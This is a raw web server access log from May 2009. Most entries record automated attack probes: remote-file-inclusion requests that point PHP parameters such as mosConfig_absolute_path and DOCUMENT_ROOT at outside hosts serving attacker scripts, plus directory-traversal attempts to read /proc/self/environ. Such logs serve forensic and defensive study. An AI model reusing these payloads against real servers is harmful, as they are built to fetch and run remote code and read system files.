88.84.128.40 - - [23/May/2009:04:45:47 -0400] "GET /logs/access_log.Q108052400///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
203.251.81.216 - - [23/May/2009:04:46:02 -0400] "GET /logs/access_log.Q108110900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
88.191.103.144 - - [23/May/2009:04:46:39 -0400] "GET /logs/access_log.Q108081600//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.825"
203.251.81.216 - - [23/May/2009:04:47:15 -0400] "GET /logs/error_log.Q109042700//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:47:15 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:47:15 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:47:15 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:04:47:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [23/May/2009:04:47:34 -0400] "GET /logs/access_log.Q108081600//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
69.16.193.132 - - [23/May/2009:04:47:41 -0400] "GET /logs/access_log.Q109051100%20%20//~computer/board/skin/zero_vote/ask_password.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 323 "-" "Mozilla/5.0"
69.172.92.14 - - [23/May/2009:04:47:50 -0400] "GET /logs/access_log.Q108112300//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:04:47:51 -0400] "GET //?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:04:47:52 -0400] "GET /logs//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
216.104.47.218 - - [23/May/2009:04:48:14 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:48:14 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:48:14 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:49:06 -0400] "GET /logs/error_log.Q109051400/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:49:10 -0400] "GET /logs/error_log.Q108122800/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
80.237.146.58 - - [23/May/2009:04:49:28 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:04:50:24 -0400] "GET /logs/access_log.Q108032900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.199.222.19 - - [23/May/2009:04:50:25 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:50:25 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:50:26 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:50:33 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.200.8.89 - - [23/May/2009:04:51:47 -0400] "GET /logs/access_log.Q108082200/config%5broot_dir%5d=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.200.8.89 - - [23/May/2009:04:51:48 -0400] "GET /config%5broot_dir%5d=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.200.8.89 - - [23/May/2009:04:51:49 -0400] "GET /logs/config%5broot_dir%5d=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:51:53 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.200.8.89 - - [23/May/2009:04:52:02 -0400] "GET /logs/access_log.Q109031800/config%5broot_dir%5d=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:52:07 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:52:07 -0400] "GET /logs/access_log.Q108112400/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:52:07 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:52:11 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:52:11 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:52:11 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.191.103.144 - - [23/May/2009:04:52:16 -0400] "GET /logs/access_log.Q108110900//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:52:16 -0400] "GET //?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:52:16 -0400] "GET /logs//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.825"
88.84.128.40 - - [23/May/2009:04:52:25 -0400] "GET /logs/access_log.Q108110900//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:04:52:26 -0400] "GET //?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:04:52:27 -0400] "GET /logs//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
209.59.12.99 - - [23/May/2009:04:52:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [23/May/2009:04:52:45 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:52:48 -0400] "GET /logs/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:52:48 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:52:48 -0400] "GET /?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:52:51 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:52:51 -0400] "GET /logs/access_log.Q108112400%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:52:55 -0400] "GET /logs/access_log.Q108112400%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:53:00 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:53:03 -0400] "GET /logs/access_log.Q108091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:04 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:04 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:04 -0400] "GET /errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:04 -0400] "GET /logs/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:21 -0400] "GET /errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:21 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:21 -0400] "GET /logs/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:53:21 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:04:53:49 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://jamur.do.am/osiris.txt??????? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
213.246.62.35 - - [23/May/2009:04:53:49 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://jamur.do.am/osiris.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
213.246.62.35 - - [23/May/2009:04:53:49 -0400] "GET /logs/error_log.Q109042900%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://jamur.do.am/osiris.txt??????? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
209.200.8.89 - - [23/May/2009:04:54:29 -0400] "GET /logs/access_log.Q108082200%20%20/config%5broot_dir%5d=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.200.8.89 - - [23/May/2009:04:54:34 -0400] "GET /logs/access_log.Q109031800%20%20/config%5broot_dir%5d=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.172.92.14 - - [23/May/2009:04:54:59 -0400] "GET /logs/access_log.Q108110900//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:04:55:00 -0400] "GET //?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:04:55:00 -0400] "GET /logs//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:04:55:01 -0400] "GET /logs/access_log.Q108081600//?index.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
58.227.193.198 - - [23/May/2009:04:55:25 -0400] "GET /logs/error_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:55:47 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:55:47 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:55:47 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:56:08 -0400] "GET /logs/access_log.Q109051200//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:56:09 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:56:09 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:57:14 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:04:57:14 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:04:57:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.171 - - [23/May/2009:04:58:02 -0400] "GET /logs/access_log.Q108111500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.16.193.132 - - [23/May/2009:04:58:19 -0400] "GET /logs/access_log.Q109051100//~computer/board/skin/zero_vote/ask_password.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:58:30 -0400] "GET //index.php/main.php?x=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:58:30 -0400] "GET /logs//index.php/main.php?x=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:58:30 -0400] "GET /logs/access_log.Q109042200%20%20//index.php/main.php?x=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
140.128.99.10 - - [23/May/2009:04:58:32 -0400] "GET /logs/access_log.Q108082200/config%5broot_dir%5d=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.76"
140.128.99.10 - - [23/May/2009:04:58:32 -0400] "GET /config%5broot_dir%5d=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.76"
140.128.99.10 - - [23/May/2009:04:58:32 -0400] "GET /logs/config%5broot_dir%5d=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.76"
200.32.100.130 - - [23/May/2009:04:58:45 -0400] "GET /logs/access_log.Q109021500%20%20//index.php/main.php?x=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
140.128.99.10 - - [23/May/2009:04:58:45 -0400] "GET /logs/access_log.Q109031800/config%5broot_dir%5d=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 270 "-" "libwww-perl/5.76"
217.199.222.19 - - [23/May/2009:04:58:59 -0400] "GET /?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:58:59 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:58:59 -0400] "GET /logs/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
222.239.76.25 - - [23/May/2009:04:59:56 -0400] "GET /logs/access_log.Q108091400%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:05:00:24 -0400] "GET /logs/access_log.Q109051200//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.172.92.14 - - [23/May/2009:05:00:24 -0400] "GET /logs/error_log.Q108020900///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:05:00:25 -0400] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
69.172.92.14 - - [23/May/2009:05:00:26 -0400] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
213.246.62.35 - - [23/May/2009:05:01:22 -0400] "GET /errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:01:22 -0400] "GET /logs/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:01:22 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:05:01:29 -0400] "GET /logs/access_log.Q109051200//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.101.211.130 - - [23/May/2009:05:01:41 -0400] "GET /errors.php?error=http://www.elite-kosmetikschule.com/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.817"
87.101.211.130 - - [23/May/2009:05:01:41 -0400] "GET /logs/errors.php?error=http://www.elite-kosmetikschule.com/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.817"
222.239.76.25 - - [23/May/2009:05:01:46 -0400] "GET /logs/access_log.Q108091400%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:01:46 -0400] "GET /errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:01:47 -0400] "GET /logs/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:01:47 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.181.7.97 - - [23/May/2009:05:02:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.172.92.14 - - [23/May/2009:05:03:37 -0400] "GET /logs/access_log.Q108052400///squirrelcart/cart_content.php?cart_isp_root=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
123.125.64.38 - - [23/May/2009:05:03:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
213.246.62.35 - - [23/May/2009:05:04:14 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.2 - - [23/May/2009:05:04:17 -0400] "GET /logs/error_log.Q109050900/%20/contrib/yabbse/poc.php?sourcedir=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.2 - - [23/May/2009:05:04:17 -0400] "GET /logs/error_log.Q109050900/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [23/May/2009:05:04:18 -0400] "GET /logs/error_log.Q109050900/%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 248 "-" "XXXXXX"
77.221.130.2 - - [23/May/2009:05:04:18 -0400] "GET /logs/error_log.Q109050900/%20/contrib/yabbse/poc.php?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 248 "-" "XXXXXX"
87.101.211.130 - - [23/May/2009:05:04:51 -0400] "GET /logs/access_log.Q108061100/errors.php?error=http://www.elite-kosmetikschule.com/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.817"
87.101.211.130 - - [23/May/2009:05:05:44 -0400] "GET /errors.php?error=http://www.elite-kosmetikschule.com/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.817"
86.39.131.85 - - [23/May/2009:05:06:16 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:06:16 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:06:16 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:06:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
86.39.131.85 - - [23/May/2009:05:06:25 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:06:25 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:06:25 -0400] "GET /logs/access_log.Q108112400%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
94.100.181.106 - - [23/May/2009:05:06:38 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mail.Ru/1.0"
94.100.181.106 - - [23/May/2009:05:06:39 -0400] "GET /logs/access_log.Q108090200 HTTP/1.0" 404 224 "-" "Mail.Ru/1.0"
86.39.131.85 - - [23/May/2009:05:06:55 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:06:55 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:06:55 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:07:40 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:07:40 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
86.39.131.85 - - [23/May/2009:05:07:40 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hdcs.se/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.122.140.8 - - [23/May/2009:05:08:16 -0400] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 229 "-" "XXXXXX"
222.122.140.8 - - [23/May/2009:05:08:16 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 251 "-" "XXXXXX"
222.122.140.8 - - [23/May/2009:05:08:16 -0400] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 224 "-" "XXXXXX"
222.122.140.8 - - [23/May/2009:05:08:17 -0400] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 229 "-" "XXXXXX"
